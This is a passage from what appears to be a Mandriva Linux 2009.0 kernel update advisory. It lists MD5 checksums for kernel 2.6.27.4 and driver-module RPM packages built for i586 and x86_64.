 ab8fb1e2847bf712d020f7924701e7b8  2009.0/i586/hsfmodem-kernel-desktop586-latest-7.68.00.13-1.20081103.1mdv2009.0.i586.rpm
 1b2367ad4daeebf3be2562279aa61adf  2009.0/i586/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20081103.1mdv2009.0.i586.rpm
 ef1ba002fbdf9c972ed81e012348d101  2009.0/i586/hsfmodem-kernel-server-latest-7.68.00.13-1.20081103.1mdv2009.0.i586.rpm
 f54d1bab38f3f3c0a40f62c61b4e9dd3  2009.0/i586/hso-kernel-2.6.27.4-desktop-1mnb-1.2-2mdv2009.0.i586.rpm
 02419869c778fe7391c31a9f9f8082d4  2009.0/i586/hso-kernel-2.6.27.4-desktop586-1mnb-1.2-2mdv2009.0.i586.rpm
 f30468948f40bb1d5d679190546ba12b  2009.0/i586/hso-kernel-2.6.27.4-server-1mnb-1.2-2mdv2009.0.i586.rpm
 92ff4b0072a4f2d33c36ea26dea15131  2009.0/i586/hso-kernel-desktop586-latest-1.2-1.20081103.2mdv2009.0.i586.rpm
 262e572384b6c439a32531d9707b7e35  2009.0/i586/hso-kernel-desktop-latest-1.2-1.20081103.2mdv2009.0.i586.rpm
 46fecfbf4552e0cbcfc607261118b3bc  2009.0/i586/hso-kernel-server-latest-1.2-1.20081103.2mdv2009.0.i586.rpm
 0fb63350c3676829b18bddb44ebe57d0  2009.0/i586/iscsitarget-kernel-2.6.27.4-desktop-1mnb-0.4.16-4mdv2009.0.i586.rpm
 005e2a08405653913c4bab4cb2e749d2  2009.0/i586/iscsitarget-kernel-2.6.27.4-desktop586-1mnb-0.4.16-4mdv2009.0.i586.rpm
 9e01eec92335628ce8051f5ae71b641c  2009.0/i586/iscsitarget-kernel-2.6.27.4-server-1mnb-0.4.16-4mdv2009.0.i586.rpm
 0d3d1fa27ad84744e407302b7b98b957  2009.0/i586/iscsitarget-kernel-desktop586-latest-0.4.16-1.20081103.4mdv2009.0.i586.rpm
 b00314af81ee3872f34f9b218c25d7f9  2009.0/i586/iscsitarget-kernel-desktop-latest-0.4.16-1.20081103.4mdv2009.0.i586.rpm
 728ce4db76cc3fc756d3298a83d00dc1  2009.0/i586/iscsitarget-kernel-server-latest-0.4.16-1.20081103.4mdv2009.0.i586.rpm
 e64dd3a1fffb82e057dbfb21c6fd892a  2009.0/i586/kernel-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 ddaeabca54c0b2b2a9cc933dad583ffd  2009.0/i586/kernel-desktop-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 a03b18533256df9c9230d49dfc7a273d  2009.0/i586/kernel-desktop586-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 fed22ae04fc3d5aff2fbe86d4e5aec53  2009.0/i586/kernel-desktop586-devel-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 348df53754c23e801adc3c4940ede3db  2009.0/i586/kernel-desktop586-devel-latest-2.6.27.4-1mnb2.i586.rpm
 f04eeabbdc9c16c8ffd101fe5e9772cd  2009.0/i586/kernel-desktop586-latest-2.6.27.4-1mnb2.i586.rpm
 d44f9d5f8606b923bfe686db333c09fb  2009.0/i586/kernel-desktop-devel-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 68e82ad8157bdc70ac163f6ce3e7ae18  2009.0/i586/kernel-desktop-devel-latest-2.6.27.4-1mnb2.i586.rpm
 0a0925e49bdc100e4186c29f7d0b96eb  2009.0/i586/kernel-desktop-latest-2.6.27.4-1mnb2.i586.rpm
 e365909d7045dd7c112cc725aef0fd02  2009.0/i586/kernel-doc-2.6.27.4-1mnb2.i586.rpm
 320f8cd0eda949a313fb352c6554036f  2009.0/i586/kernel-server-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 a4abe1fa93aea0a69a5d18cd3fcb32ea  2009.0/i586/kernel-server-devel-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 793f32a173b4cab829deb9709f9b32ae  2009.0/i586/kernel-server-devel-latest-2.6.27.4-1mnb2.i586.rpm
 fe66b01149ebb8ab59ba33574aa28c55  2009.0/i586/kernel-server-latest-2.6.27.4-1mnb2.i586.rpm
 fe8a545e4c3d6ac015887565a27e25bb  2009.0/i586/kernel-source-2.6.27.4-1mnb-1-1mnb2.i586.rpm
 2657c1b5dffef10973837b5db7c6e49a  2009.0/i586/kernel-source-latest-2.6.27.4-1mnb2.i586.rpm
 d910ceeaf1731b142f2b61473dc4db0f  2009.0/i586/kqemu-kernel-2.6.27.4-desktop-1mnb-1.4.0pre1-0.i586.rpm
 babd7061031eb9f24141df06ac72d2e6  2009.0/i586/kqemu-kernel-2.6.27.4-desktop586-1mnb-1.4.0pre1-0.i586.rpm
 76c5bfae82777911df8d6fa3abcb77c3  2009.0/i586/kqemu-kernel-2.6.27.4-server-1mnb-1.4.0pre1-0.i586.rpm
 186c172cc97ae3cb0a35119d94336882  2009.0/i586/kqemu-kernel-desktop586-latest-1.4.0pre1-1.20081103.0.i586.rpm
 7f86afb4953b10fce27743c6fec413d9  2009.0/i586/kqemu-kernel-desktop-latest-1.4.0pre1-1.20081103.0.i586.rpm
 4bf5eecf729ba8412ecaeebc6bbbbfec  2009.0/i586/kqemu-kernel-server-latest-1.4.0pre1-1.20081103.0.i586.rpm
 59b8d02200edfe8f8c1670d4c065c555  2009.0/i586/lirc-kernel-2.6.27.4-desktop-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 226319d776e13913e8eb671a82244df2  2009.0/i586/lirc-kernel-2.6.27.4-desktop586-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 420ca1037b78bc5cb8149aabea3f247c  2009.0/i586/lirc-kernel-2.6.27.4-server-1mnb-0.8.3-4.1mdv2009.0.i586.rpm
 f51368daf49632d785b81aa747c7b5ee  2009.0/i586/lirc-kernel-desktop586-latest-0.8.3-1.20081103.4.1mdv2009.0.i586.rpm
 66346bdecf8dc401b6c9196a74bdd2d8  2009.0/i586/lirc-kernel-desktop-latest-0.8.3-1.20081103.4.1mdv2009.0.i586.rpm
 73ce4f618aabcb793fde16f2f0e4dc53  2009.0/i586/lirc-kernel-server-latest-0.8.3-1.20081103.4.1mdv2009.0.i586.rpm
 39a9d881ba56d1cd6700eda8a460974e  2009.0/i586/lzma-kernel-2.6.27.4-desktop-1mnb-4.43-24mdv2009.0.i586.rpm
 89d5c1beb20bb636bda6c52d977c2b14  2009.0/i586/lzma-kernel-2.6.27.4-desktop586-1mnb-4.43-24mdv2009.0.i586.rpm
 2aed9d63a09438a347bdbb5738640511  2009.0/i586/lzma-kernel-2.6.27.4-server-1mnb-4.43-24mdv2009.0.i586.rpm
 5f6787ea4d45967251f12f40b4029186  2009.0/i586/lzma-kernel-desktop586-latest-4.43-1.20081103.24mdv2009.0.i586.rpm
 1eecced8bd847596301be7cdc4c78ec3  2009.0/i586/lzma-kernel-desktop-latest-4.43-1.20081103.24mdv2009.0.i586.rpm
 623ccdda8477adf7d911f8152b1c5154  2009.0/i586/lzma-kernel-server-latest-4.43-1.20081103.24mdv2009.0.i586.rpm
 f2a4612428a54a93bae573f94ef67d7d  2009.0/i586/madwifi-kernel-2.6.27.4-desktop-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 e9243744385f63f09cc5e7bb1e1d2b87  2009.0/i586/madwifi-kernel-2.6.27.4-desktop586-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 69445ed07736aaa3050c05c7eab18677  2009.0/i586/madwifi-kernel-2.6.27.4-server-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 4bd2813ac6d3b142c474b439a826736a  2009.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20081103.3.r3835mdv2009.0.i586.rpm
 97455cc3f5dedb652c1a9bef96177ca2  2009.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20081103.3.r3835mdv2009.0.i586.rpm
 995927a915567af5e3be6dcf38cf30af  2009.0/i586/madwifi-kernel-server-latest-0.9.4-1.20081103.3.r3835mdv2009.0.i586.rpm
 e5b70e58a95bdc724223719961ec7cee  2009.0/i586/nvidia173-kernel-2.6.27.4-desktop-1mnb-173.14.12-4mdv2009.0.i586.rpm
 31693db2416595a17e07bbcc9a00694c  2009.0/i586/nvidia173-kernel-2.6.27.4-desktop586-1mnb-173.14.12-4mdv2009.0.i586.rpm
 7d2c50c46fd925f7db01531bd57200c9  2009.0/i586/nvidia173-kernel-desktop586-latest-173.14.12-1.20081103.4mdv2009.0.i586.rpm
 f6319b82e332a8724989f86228368e84  2009.0/i586/nvidia173-kernel-desktop-latest-173.14.12-1.20081103.4mdv2009.0.i586.rpm
 9ced24b0fbfe10d840fbfdea105789c0  2009.0/i586/nvidia71xx-kernel-2.6.27.4-desktop-1mnb-71.86.06-5mdv2009.0.i586.rpm
 a87900baa3b7009d0f7588b1b90bde2f  2009.0/i586/nvidia71xx-kernel-2.6.27.4-desktop586-1mnb-71.86.06-5mdv2009.0.i586.rpm
 7fb30e6c046ad52c5f36dbce0cb9a84d  2009.0/i586/nvidia71xx-kernel-2.6.27.4-server-1mnb-71.86.06-5mdv2009.0.i586.rpm
 21d5784f98750d9f074a37158fc88f73  2009.0/i586/nvidia71xx-kernel-desktop586-latest-71.86.06-1.20081103.5mdv2009.0.i586.rpm
 68bf676f1ee618a9b6fb79bd83ed1ea6  2009.0/i586/nvidia71xx-kernel-desktop-latest-71.86.06-1.20081103.5mdv2009.0.i586.rpm
 8c5bbcd6a8bfaed8c30b86001f3f5ba5  2009.0/i586/nvidia71xx-kernel-server-latest-71.86.06-1.20081103.5mdv2009.0.i586.rpm
 69739d75365026269e11dfc0b4db8932  2009.0/i586/nvidia96xx-kernel-2.6.27.4-desktop-1mnb-96.43.07-5mdv2009.0.i586.rpm
 203cd2564988a72ddb229d2dbd182dd9  2009.0/i586/nvidia96xx-kernel-2.6.27.4-desktop586-1mnb-96.43.07-5mdv2009.0.i586.rpm
 c9748367298cc8b667c1875284d63c3b  2009.0/i586/nvidia96xx-kernel-2.6.27.4-server-1mnb-96.43.07-5mdv2009.0.i586.rpm
 88008c6cabb1bc1795b631a90ad67f63  2009.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.07-1.20081103.5mdv2009.0.i586.rpm
 2ba88ed1d471324dd21c319083b61182  2009.0/i586/nvidia96xx-kernel-desktop-latest-96.43.07-1.20081103.5mdv2009.0.i586.rpm
 4f19ba57df466d0e3f40c1064a147016  2009.0/i586/nvidia96xx-kernel-server-latest-96.43.07-1.20081103.5mdv2009.0.i586.rpm
 b6e0280b19ac3ad18d12e324a5027bff  2009.0/i586/nvidia-current-kernel-2.6.27.4-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm
 8114191fdf4eb331527e266d64ee8ede  2009.0/i586/nvidia-current-kernel-2.6.27.4-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm
 442f7d899356849023fbe116c6bedd59  2009.0/i586/nvidia-current-kernel-2.6.27.4-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
 d1105beb4d5f38a8ead9eb00ee76997f  2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm
 37c1a2ec558c2fb51dc77030aab18f57  2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm
 21634aaa76b1c3bffdc46e5a1981acca  2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20081103.2.3mdv2009.0.i586.rpm
 75fa6f12ec5ab01802404100fd8979b0  2009.0/i586/omfs-kernel-2.6.27.4-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
 6da40c13cb157deb7fffb4cff3e77319  2009.0/i586/omfs-kernel-2.6.27.4-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
 3b603c2292892a161230f06a948af2da  2009.0/i586/omfs-kernel-2.6.27.4-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
 b750da72e946c6c160c76d8d11250e42  2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm
 bcbf8269b1fe852b61a5b558d254b37c  2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm
 c618b73eeb9f15094b18e2d80a4d79f3  2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20081103.1mdv2009.0.i586.rpm
 e187b074109fedaf9b9771c4da2a96a5  2009.0/i586/omnibook-kernel-2.6.27.4-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 941b771c5cd0598695e8a3ea665302b5  2009.0/i586/omnibook-kernel-2.6.27.4-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 9d7336b34390f13ff92c53e1478c984a  2009.0/i586/omnibook-kernel-2.6.27.4-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 eccd344fefcaa996cafcc8ebce16050c  2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm
 8a18b671a866951f1d553ae79a570a96  2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm
 8db089d8a0df01a301e608eb1a12fa77  2009.0/i586/omnibook-kernel-server-latest-20080513-1.20081103.0.274.1mdv2009.0.i586.rpm
 b171c1bc5dddc32d6d79dad8e3f3d276  2009.0/i586/opencbm-kernel-2.6.27.4-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 ab888569f4827cb9a58ca70adb24af9b  2009.0/i586/opencbm-kernel-2.6.27.4-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 dc08dcda692acd8b73c91d451c1a3751  2009.0/i586/opencbm-kernel-2.6.27.4-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 52896db6af58703701b2ddca4876ea6e  2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm
 64c7ec015c8ad685c54a55876eaa803a  2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm
 4d3de147372f65cedec14b7681ec8fec  2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20081103.1mdv2008.1.i586.rpm
 9fbe037c5569de75a4ca04db09e73179  2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-desktop-1mnb-1.5.8-1mdv2009.0.i586.rpm
 27cdd931be93ce026bd989265080623d  2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-desktop586-1mnb-1.5.8-1mdv2009.0.i586.rpm
 c7d2d072fe263e53bb1fb0316f4c6ba3  2009.0/i586/ov51x-jpeg-kernel-2.6.27.4-server-1mnb-1.5.8-1mdv2009.0.i586.rpm
 5212ac1714fa8e7b637f013f31ffe596  2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm
 343048ce6070308dd5cd723fcd11de3b  2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm
 64f4b13efa5778e2755c66949f022fbd  2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.8-1.20081103.1mdv2009.0.i586.rpm
 25f7d2eef8b034053db58386a940030b  2009.0/i586/qc-usb-kernel-2.6.27.4-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
 7ad14a6942f8c143429d96c89d10e071  2009.0/i586/qc-usb-kernel-2.6.27.4-desktop586-1mnb-0.6.6-6mdv2009.0.i586.rpm
 2dc33d46ec22b34ecbd4f8ab58131b77  2009.0/i586/qc-usb-kernel-2.6.27.4-server-1mnb-0.6.6-6mdv2009.0.i586.rpm
 6f56de9487add6f85f1400a5ef128ef1  2009.0/i586/qc-usb-kernel-desktop586-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm
 6d065121cd9d907c2041d40cf0aec8a9  2009.0/i586/qc-usb-kernel-desktop-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm
 16898de62cbf5788a3eba210cbf85912  2009.0/i586/qc-usb-kernel-server-latest-0.6.6-1.20081103.6mdv2009.0.i586.rpm
 1c53121930462ced59cd5fc480ef92ef  2009.0/i586/rt2860-kernel-2.6.27.4-desktop-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 d7d2aeaaf374a833c498d982c07c66dc  2009.0/i586/rt2860-kernel-2.6.27.4-desktop586-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 a9d6360a2f210da1616ee0d515d911e9  2009.0/i586/rt2860-kernel-2.6.27.4-server-1mnb-1.7.0.0-2mdv2009.0.i586.rpm
 64ed536cbdc1a0072684facaa7efe34c  2009.0/i586/rt2860-kernel-desktop586-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm
 fda2a0fc51844bedfa6c3a1a9b0a065e  2009.0/i586/rt2860-kernel-desktop-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm
 a2a7ba4d11853ca799c11d1c057785ff  2009.0/i586/rt2860-kernel-server-latest-1.7.0.0-1.20081103.2mdv2009.0.i586.rpm
 4d5980f1e5cb0f6b9baf0aa2c365ed70  2009.0/i586/rt2870-kernel-2.6.27.4-desktop-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 52d6f2251df72952a163489e4e090076  2009.0/i586/rt2870-kernel-2.6.27.4-desktop586-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 d78c37fa6adc19b57907288883ccac22  2009.0/i586/rt2870-kernel-2.6.27.4-server-1mnb-1.3.1.0-2mdv2009.0.i586.rpm
 2bb6ecb4d7b984bbf92e2508b4bf2d07  2009.0/i586/rt2870-kernel-desktop586-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm
 26bacbf0a67027b9c5538f5e1d800930  2009.0/i586/rt2870-kernel-desktop-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm
 19ec1011940eebb0d4ab6bc460f56962  2009.0/i586/rt2870-kernel-server-latest-1.3.1.0-1.20081103.2mdv2009.0.i586.rpm
 21555e24a3a7b8e5e13b497b4bdda888  2009.0/i586/rtl8187se-kernel-2.6.27.4-desktop-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 c74cc82c581e63cce392a288f2b878d1  2009.0/i586/rtl8187se-kernel-2.6.27.4-desktop586-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 624804b8ff56fb12252dab835fdb718b  2009.0/i586/rtl8187se-kernel-2.6.27.4-server-1mnb-1016.20080716-1.1mdv2009.0.i586.rpm
 95b0a1ec0f5673410477700c8b70579a  2009.0/i586/rtl8187se-kernel-desktop586-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm
 ee40b0cc41bcbedb1978bcb416c0e228  2009.0/i586/rtl8187se-kernel-desktop-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm
 ef584c292af203700d0cdeeb60371df0  2009.0/i586/rtl8187se-kernel-server-latest-1016.20080716-1.20081103.1.1mdv2009.0.i586.rpm
 171f50b6097ff4ed943d235412ee511e  2009.0/i586/slmodem-kernel-2.6.27.4-desktop-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 02ce2b1680cb872e8e7900f9b04a4fe9  2009.0/i586/slmodem-kernel-2.6.27.4-desktop586-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 654172d635d014b40a4d6ced78e2d694  2009.0/i586/slmodem-kernel-2.6.27.4-server-1mnb-2.9.11-0.20080817.1mdv2009.0.i586.rpm
 617ad09223b5da97d777cb086c79347c  2009.0/i586/slmodem-kernel-desktop586-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm
 537b5b2b4381eae30329550a29d92df6  2009.0/i586/slmodem-kernel-desktop-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm
 c23768f3a2b5ce96bd5496956b1192b4  2009.0/i586/slmodem-kernel-server-latest-2.9.11-1.20081103.0.20080817.1mdv2009.0.i586.rpm
 beb2f00b2fa394f2fd25c1a419124321  2009.0/i586/squashfs-lzma-kernel-2.6.27.4-desktop-1mnb-3.3-5mdv2009.0.i586.rpm
 4e04bda51849d92e92aaaadc401d5b72  2009.0/i586/squashfs-lzma-kernel-2.6.27.4-desktop586-1mnb-3.3-5mdv2009.0.i586.rpm
 f12202cdf0fa425c8bb8924f5c20c719  2009.0/i586/squashfs-lzma-kernel-2.6.27.4-server-1mnb-3.3-5mdv2009.0.i586.rpm
 c8cf65026c0e3dd2d1391a021d933fc7  2009.0/i586/squashfs-lzma-kernel-desktop586-latest-3.3-1.20081103.5mdv2009.0.i586.rpm
 26cdcc142de71a295063ed06f792d3af  2009.0/i586/squashfs-lzma-kernel-desktop-latest-3.3-1.20081103.5mdv2009.0.i586.rpm
 a55cf0b17888fb83ebc7728526dbc715  2009.0/i586/squashfs-lzma-kernel-server-latest-3.3-1.20081103.5mdv2009.0.i586.rpm
 0f6a1dc0011f1c92a53c095ec1d4ec9f  2009.0/i586/tp_smapi-kernel-2.6.27.4-desktop-1mnb-0.37-2mdv2009.0.i586.rpm
 3d8fa83a0b50cbc223bb26248c46a2d2  2009.0/i586/tp_smapi-kernel-2.6.27.4-desktop586-1mnb-0.37-2mdv2009.0.i586.rpm
 3765bc17b489e48671736d1c9a7a15b2  2009.0/i586/tp_smapi-kernel-2.6.27.4-server-1mnb-0.37-2mdv2009.0.i586.rpm
 05a274ff9aa0c4800f748b1adf8c0ca8  2009.0/i586/tp_smapi-kernel-desktop586-latest-0.37-1.20081103.2mdv2009.0.i586.rpm
 2d0a3ec08fe46521b03230374fe21f13  2009.0/i586/tp_smapi-kernel-desktop-latest-0.37-1.20081103.2mdv2009.0.i586.rpm
 f9d94d3034572f16502b0a387f38a663  2009.0/i586/tp_smapi-kernel-server-latest-0.37-1.20081103.2mdv2009.0.i586.rpm
 b96e502f70fabec4e66c71928c6d3fc8  2009.0/i586/vboxadd-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 c96cd5a5e194e67a14a003a0be06d785  2009.0/i586/vboxadd-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 6ca17d51b41d741a6b4cb851b0bbf84d  2009.0/i586/vboxadd-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 1b0cfe92246f61e57744aeda1a924dbf  2009.0/i586/vboxadd-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 c3699e6091d24971e1040c8e49b8bd7a  2009.0/i586/vboxadd-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 d167d9e6f440798ef96313926ce0aa9c  2009.0/i586/vboxadd-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 f86bf849193304c66537768239afd183  2009.0/i586/vboxvfs-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 c577a720c0a0b05feb8a777e01b23117  2009.0/i586/vboxvfs-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 46daba29c3656290df7125f0d9c5a657  2009.0/i586/vboxvfs-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 0757a9d5507e1b78c8af4f0ec2fcbca7  2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 58fa363ded3d32dded985e9e393e61d0  2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 79d04b8b6da4230ae4f5247c4b9bb050  2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 aa87c0d7c23ee96d68a6922ac01ec5c8  2009.0/i586/vhba-kernel-2.6.27.4-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 921f83a72a4b880dc34b8d729e5e59f0  2009.0/i586/vhba-kernel-2.6.27.4-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 e65f431b06a7a510db0e9b8dc5e627a4  2009.0/i586/vhba-kernel-2.6.27.4-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
 c35a379751fb20657e2f9bfe950751eb  2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm
 cbaea9dff2fbf424e4569c01c33862c7  2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm
 8205d8d0d5ffcefc2c0fc3a8804622c0  2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20081103.1.svn304.1mdv2009.0.i586.rpm
 19d9ca5fecde7236443d31256d8b57f0  2009.0/i586/virtualbox-kernel-2.6.27.4-desktop-1mnb-2.0.2-2mdv2009.0.i586.rpm
 ba63c7e1924ed8f665e60709fb35a196  2009.0/i586/virtualbox-kernel-2.6.27.4-desktop586-1mnb-2.0.2-2mdv2009.0.i586.rpm
 2a093fd2afa956acc0fc35817978d294  2009.0/i586/virtualbox-kernel-2.6.27.4-server-1mnb-2.0.2-2mdv2009.0.i586.rpm
 8bdef255c2cfcf7f05913f0561a7f1d2  2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 1849334aa93aa335532907a755b3871d  2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 dcf04d332cec94932656bf4bb1bdc283  2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20081103.2mdv2009.0.i586.rpm
 8a685d9c111e106c699d7d47d093c432  2009.0/i586/vpnclient-kernel-2.6.27.4-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 77636aeacc19e8256b9febc077c27e00  2009.0/i586/vpnclient-kernel-2.6.27.4-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 7d4b4f915950fe55b4425d1b2bff481e  2009.0/i586/vpnclient-kernel-2.6.27.4-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
 02f0fbf02e9bfe6d4926196d892d2257  2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm
 c8f85729c9c2a8764bba33b96a5f65fa  2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm
 046722547c486dfb051857d8aeec040b  2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20081103.3mdv2009.0.i586.rpm 
 b154ea6c4d96dfa8e57773bd90ab7347  2009.0/SRPMS/kernel-2.6.27.4-1mnb2.src.rpm

 Mandriva Linux 2009.0/X86_64:
 edde427053c0325b157ba601cc044f4b  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.4-desktop-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 d10c758ae813b24af7c85f52779c320f  2009.0/x86_64/alsa_raoppcm-kernel-2.6.27.4-server-1mnb-0.5.1-2mdv2008.0.x86_64.rpm
 3ba7297853bf4eb4c2c07ff180f0132d  2009.0/x86_64/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20081103.2mdv2008.0.x86_64.rpm
 9603d7a26e44a0f1d13d3bf9097e508b  2009.0/x86_64/alsa_raoppcm-kernel-server-latest-0.5.1-1.20081103.2mdv2008.0.x86_64.rpm
 917b4c0ad28f8131f931d31384843850  2009.0/x86_64/drm-experimental-kernel-2.6.27.4-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 099212e3d26d235941f2af7f360820c0  2009.0/x86_64/drm-experimental-kernel-2.6.27.4-server-1mnb-2.3.0-2.20080912.1mdv2009.0.x86_64.rpm
 5319201ced91ff62ccb79efb8d11d6c2  2009.0/x86_64/drm-experimental-kernel-desktop-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.x86_64.rpm
 b293f3f4fbce793f3bff6b5e174cfb05  2009.0/x86_64/drm-experimental-kernel-server-latest-2.3.0-1.20081103.2.20080912.1mdv2009.0.x86_64.rpm
 a96f2e4989cd8ed91014c77b44239ec2  2009.0/x86_64/et131x-kernel-2.6.27.4-desktop-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 a9a374da5682e5178d36f2d406d8c218  2009.0/x86_64/et131x-kernel-2.6.27.4-server-1mnb-1.2.3-7mdv2009.0.x86_64.rpm
 6e90ed1607e0b7fe8d209f8db921badc  2009.0/x86_64/et131x-kernel-desktop-latest-1.2.3-1.20081103.7mdv2009.0.x86_64.rpm
 63bb5e97118e06f1886674fa87667335  2009.0/x86_64/et131x-kernel-server-latest-1.2.3-1.20081103.7mdv2009.0.x86_64.rpm
 1774fa42da75c7fb14d68c7b29823963  2009.0/x86_64/fglrx-kernel-2.6.27.4-desktop-1mnb-8.522-3mdv2009.0.x86_64.rpm
 f18a7786083993c33ef12f82b2bd0e24  2009.0/x86_64/fglrx-kernel-2.6.27.4-server-1mnb-8.522-3mdv2009.0.x86_64.rpm
 5ed11fbc7ae42ba9bfa9329e92018c06  2009.0/x86_64/fglrx-kernel-desktop-latest-8.522-1.20081103.3mdv2009.0.x86_64.rpm
 4a825366b32f7003c969314a1716ad98  2009.0/x86_64/fglrx-kernel-server-latest-8.522-1.20081103.3mdv2009.0.x86_64.rpm
 98e7002c359470d13a827880c559af37  2009.0/x86_64/gnbd-kernel-2.6.27.4-desktop-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 d23b4af98e62e6497efc90a617234f41  2009.0/x86_64/gnbd-kernel-2.6.27.4-server-1mnb-2.03.07-2mdv2009.0.x86_64.rpm
 2852a45b3ca5ecc069e90d4cc8537e9b  2009.0/x86_64/gnbd-kernel-desktop-latest-2.03.07-1.20081103.2mdv2009.0.x86_64.rpm
